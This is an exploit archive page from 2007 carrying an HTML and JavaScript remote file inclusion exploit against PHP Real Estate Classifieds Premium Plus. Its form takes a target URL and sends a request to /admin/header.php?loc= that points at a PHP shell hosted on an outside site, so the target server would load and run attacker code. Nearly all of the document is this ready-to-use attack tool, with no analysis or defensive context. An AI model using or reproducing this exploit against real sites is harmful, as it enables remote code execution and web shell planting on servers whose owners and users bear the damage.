Home / exploits prec-rfi.txt
Posted on 11 June 2007
html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>PHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion Exploit</title> <script language="JavaScript"> //=============================================================================================== //[Script Name: PHP Real Estate Classifieds Premium Plus //[ not sec group //[Author : http://notsec.com //[Email : info@notsec.com //=============================================================================================== //developers page: http://phprealestatescript.com/ var path="/admin/" var adres="header.php" var acik ="?loc=" var shell="http://notsec.com/shell.txt" // put THE php shell here function command(){ if (document.rfi.target1.value==""){ alert("Failed.."); return false; } rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready rfi.submit(); } </script> </head> <body bgcolor="white"> <center> <p><b><font face="Arial" size="1" color="black">PHP Real Estate (header.php) Remote File Inclusion Exploit</font></b></p> <p> <form method="post" target="getting" name="rfi" onSubmit="command();"> <b><font face="verdana" size="1" color="black">Target:</font> <font face="verdana" size="1" color="black">[http://[vittima]/[path]</font><font color="black" size="2" face="Tahoma"> </font><font color="white" size="1"> </font></b> <input type="text" name="target1" size="10" style="background-color: white" onmouseover="javascript:this.style.background='white';" onmouseout="javascript:this.style.background='white';"></p> <p><input type="submit" value="submit" name="B1"><input type="reset" value="reset" name="B2"></p> </form> <p><br> <iframe name="getting" height="400" width="650" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="verdana" size="1" color="gray"># notsec.com [08-06-2007]</font></b><p></b></p> </p> </center> </body> </html>